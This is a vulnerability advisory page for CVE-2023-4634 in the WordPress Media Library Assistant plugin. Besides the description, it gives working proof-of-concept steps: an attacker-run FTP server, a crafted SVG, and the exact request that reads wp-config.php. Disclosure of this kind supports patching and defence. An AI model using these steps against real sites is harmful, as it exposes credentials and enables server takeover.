Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitWpvulndbWPEX-ID:E07091B7-2168-4DA3-8CF3-7669F0DD823D
HistorySep 07, 2023 - 12:00 a.m.

Media Library Assistant < 3.10 - Unauthenticated Local/Remote File Inclusion & Remote Code Execution

2023-09-0700:00:00
wpvulndb
55
media library
unauthenticated
remote execution
svg
imagemagick
ftp
file inclusion
github
wordpress
cve-2023-4634

AI Score

9.9

Confidence

High

EPSS

0.032

Percentile

91.4%

JSON

Description The plugin is vulnerable to Local File Inclusion and Remote Code Execution in versions up to, and including, 3.09. This is due to insufficient controls on file paths being supplied to the ‘mla_stream_file’ parameter from the ~/includes/mla-stream-image.php file, where images are processed via Imagick(). This makes it possible for unauthenticated attackers to supply files via FTP that will make directory lists, local file inclusion, and remote code execution possible.

LFI:

1. Set up a local FTP server. This may be done using python as follows:

python3 -m pyftpdlib -p 2122

2. Add files `lfi.svg` and `lfi.svg[0]` with the following content:

<svg width="500" height="500"
xmlns:xlink="http://www.w3.org/1999/xlink">
xmlns="http://www.w3.org/2000/svg">
<image xlink:href= "text:../../../../wp-config.php" width="500" height="500" />
</svg>

3. Ensure that ImageMagick on the server supports the SVG format (`identify -list format | grep -i svg`).

4. Visit `/wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://FTP_SERVER:FTP_PORT/lfi.svg&mla_debug=log&mla_stream_height=500&mla_stream_width=600` with correct values of FTP_SERVER and FTP_PORT to view the contents of the `wp-config.php` file.

RCE:

See full details on in the blog post, and the exploit script on Github:

- https://patrowl.io/blog-wordpress-media-library-rce-cve-2023-4634/
- https://github.com/Patrowl/CVE-2023-4634/

Related

cve 1
cvelist 1
nuclei 1
githubexploit 1
nvd 1
prion 1
exploitdb 1
zdt 1
wpvulndb 1
wordfence 1
cve
cve
CVE-2023-4634
2023-09-06 09:15:08
cvelist
cvelist
CVE-2023-4634
2023-09-06 08:27:50
nuclei
nuclei
Media Library Assistant < 3.09 - Remote Code Execution/Local File Inclusion
2023-09-05 13:30:09
githubexploit
githubexploit
Exploit for CVE-2023-4634
2023-09-05 07:44:15
nvd
nvd
CVE-2023-4634
2023-09-06 09:15:08
prion
prion
Input validation
2023-09-06 09:15:00
exploitdb
exploitdb
Media Library Assistant Wordpress Plugin - RCE and LFI
2023-10-09 00:00:00
zdt
zdt
Wordpress Media Library Assistant Plugin - Remote Code Execution / Local File Inclusion Exploit
2023-10-09 00:00:00
wpvulndb
wpvulndb
Media Library Assistant < 3.10 - Unauthenticated Local/Remote File Inclusion & Remote Code Execution
2023-09-07 00:00:00
wordfence
wordfence
Wordfence Intelligence Weekly WordPress Vulnerability Report (September 4, 2023 to September 10, 2023)
2023-09-14 14:16:39

AI Score

9.9

Confidence

High

EPSS

0.032

Percentile

91.4%

JSON
Related for WPEX-ID:E07091B7-2168-4DA3-8CF3-7669F0DD823D
cve1cvelist1nuclei1githubexploit1nvd1prion1exploitdb1zdt1wpvulndb1wordfence1